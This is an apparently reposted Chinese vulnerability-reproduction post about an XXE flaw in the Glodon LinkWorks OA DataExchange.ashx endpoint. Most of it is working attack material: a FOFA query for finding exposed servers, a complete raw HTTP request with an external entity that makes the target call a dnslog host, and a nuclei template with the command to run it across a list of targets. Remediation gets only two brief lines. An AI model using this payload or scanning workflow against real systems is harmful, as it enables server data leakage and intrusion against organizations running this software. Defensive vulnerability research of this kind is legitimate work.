01漏洞名
02漏洞影响
广联达Linkworks办公OA
![[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞](http://cn-sec.com/wp-content/uploads/2024/03/10-1709594800.png "[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞")
03漏洞描述
广联达LinkWorks办公OA(Office Automation)是一款综合办公自动化系统,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。该系统/GB/LK/Document/DataExchange/DataExchange.ashx接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。
04FOFA搜索语句
body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"![[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞](http://cn-sec.com/wp-content/uploads/2024/03/0-1709594801.png "[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞")
05漏洞复现
注册一个dnslog平台的账号,用于回显,如http://dnslog.pw/dns/?&monitor=true,注册好之后勾选自动刷新选项,然后向靶场发送如下数据包,让靶场解析xml数据然后访问dns
POST/GB/LK/Document/DataExchange/DataExchange.ashxHTTP/1.1Host: 192.168.40.130:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Content-Length: 415Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0Purpose: prefetchSec-Purpose: prefetch;prerender------WebKitFormBoundaryJGgV5l5ta05yAIe0Content-Disposition: form-data;name="SystemName"BIM------WebKitFormBoundaryJGgV5l5ta05yAIe0Content-Disposition: form-data;name="Params"Content-Type: text/plain<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">]><test>&t;</test>------WebKitFormBoundaryJGgV5l5ta05yAIe0--
在DNSlog平台能看到一条访问记录
![[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞](http://cn-sec.com/wp-content/uploads/2024/03/5-1709594802.png "[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞")
漏洞复现成功
06nuclei poc
poc文件内容如下
id: glodon-linkworks-DataExchange-xxeinfo:name: 广联达Linkworks DataExchange.ashx XXE漏洞author: fgzseverity: criticaldescription: 广联达LinkWorks办公OA(Office Automation)是一款综合办公自动化系统,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。该系统/GB/LK/Document/DataExchange/DataExchange.ashx接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。metadata:max-request: 1fofa-query: body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"verified: truerequests:- raw:- |+POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Sec-Purpose: prefetch;prerenderPurpose: prefetchAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0------WebKitFormBoundaryJGgV5l5ta05yAIe0Content-Disposition: form-data;name="SystemName"BIM------WebKitFormBoundaryJGgV5l5ta05yAIe0Content-Disposition: form-data;name="Params"Content-Type: text/plain<!ENTITY t SYSTEM "http://{{interactsh-url}}">]><test>&t;</test>------WebKitFormBoundaryJGgV5l5ta05yAIe0--matchers:- type: dsldsl:- contains(interactsh_protocol, "dns")condition: and
运行POC
nuclei.exe -t mypoc/广联达/glodon-linkworks-DataExchange-xxe.yaml -l data/广联达Linkworks.txt![[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞](http://cn-sec.com/wp-content/uploads/2024/03/5-1709594803.png "[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞")
07修复建议
1、请关注厂商主页,联系厂商获取补丁。
2、请设置访问地址白名单。
参考链接
http://www.glinkworks.com
原文始发于微信公众号(AI与网安):[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论